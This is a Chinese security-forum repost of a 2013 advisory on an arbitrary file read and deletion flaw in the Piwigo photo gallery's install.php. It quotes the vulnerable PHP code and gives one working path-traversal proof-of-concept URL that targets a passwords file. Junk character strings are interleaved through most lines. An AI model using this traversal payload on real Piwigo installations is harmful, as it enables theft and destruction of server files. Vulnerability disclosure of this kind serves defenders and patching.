找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2233|回复: 0
打印 上一主题 下一主题

Piwigo任意文件泄露和任意文件删除漏洞

[复制链接]
跳转到指定楼层
楼主
发表于 2013-3-14 20:15:53 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
Piwigo是用PHP编写的相册脚本。
6 e  [' _* e6 w, z4 f$ _. s3 H
1 }/ `0 x0 E5 n1 p/ ]1 aPiwigo 2.4.6及其他版本没有正确验证install.php脚本的 'dl'参数值,在实现上存在安全漏洞,攻击者可利用这些漏洞查看受影响计算机上的任意文件,删除受影响应用上下文内的任意文件。
/ G) B* q1 t" z====================================================================
' Y) _9 l0 E: E0 R: x" _) q/install.php:1 u, X4 I. ]9 i/ G# J$ l8 n
-------------
2 U  y% g2 A; @- g" o113: if (!empty($_GET['dl']) && file_exists(PHPWG_ROOT_PATH.$conf['data_location'].'pwg_'.$_GET['dl']))
2 E+ i; Z. q' {- p; H114: {
& F. V1 ?& @0 G2 v' _" E115:   $filename = PHPWG_ROOT_PATH.$conf['data_location'].'pwg_'.$_GET['dl'];+ B4 x  N4 i3 r2 E5 J+ v
116:   header('Cache-Control: no-cache, must-revalidate');5 q4 K4 N) y7 t7 @! l! }/ k
117:   header('Pragma: no-cache');! |" E4 A1 }( X4 U4 H0 `" ^
118:   header('Content-Disposition: attachment; filename="database.inc.php"');- ~- A! K: Y- f! g, o4 d8 K1 J, d  T7 b* c/ z
119:   header('Content-Transfer-Encoding: binary');
# j7 X- h; a; }' D1 ]0 O4 U+ n4 N120:   header('Content-Length: '.filesize($filename));
2 ^9 [3 o7 k; e3 A8 O  d6 r3 S121:   echo file_get_contents($filename);2 H2 u: K( w+ w( H, h7 I
122:   unlink($filename);1 m; E7 D" l( F, y  H
123:   exit();
5 a+ M+ D7 x) ]: k124: }
9 H( ~+ w# Z! G' ^, Y====================================================================+ R. w' L2 F7 n+ E# \6 J

) p% T- M9 \. T& \5 P. wTested on: Microsoft Windows 7 Ultimate SP1 (EN)- _$ p; V# R7 ~% q! P% E, _+ ^
           Apache 2.4.2 (Win32)
; p) K- Y* Z: o, }# P2 K5 W' D2 D) f           PHP 5.4.48 q$ q* t% q3 m( a
           MySQL 5.5.25a
% P. q& B# X6 E4 @1 W! d
* g4 `& F4 A. P( mVulnerability discovered by Gjoko 'LiquidWorm' Krstic
$ J( U; @+ C$ |4 X6 M- J4 |/ @                            @zeroscience
' i$ G( E" e' t8 ?1 g9 O
) t9 g2 n! O: O) n5 UAdvisory ID: ZSL-2013-51271 g0 P  t5 z8 U7 ~: K# W5 ?( A: u/ |
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2013-5127.php( n& L: v& y% Z0 |
Vendor Patch: http://piwigo.org/bugs/view.php?id=2843
5 p& ~" T. Z7 X! V! m# s6 m 4 R* q+ O4 P6 [( y2 U1 h" V1 A
15.02.2013* q$ C; M& v5 a; [  _
$ q9 B% K; z2 M& ^2 ?& t
--) j' l2 L& Y+ ]/ a2 u- N4 ^2 y
http://localhost/piwigo/install.php?dl=../../../../../../lio_passwords.txt  r+ U5 P" l# J2 r

0 R8 U! V6 u- y2 f/ f
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表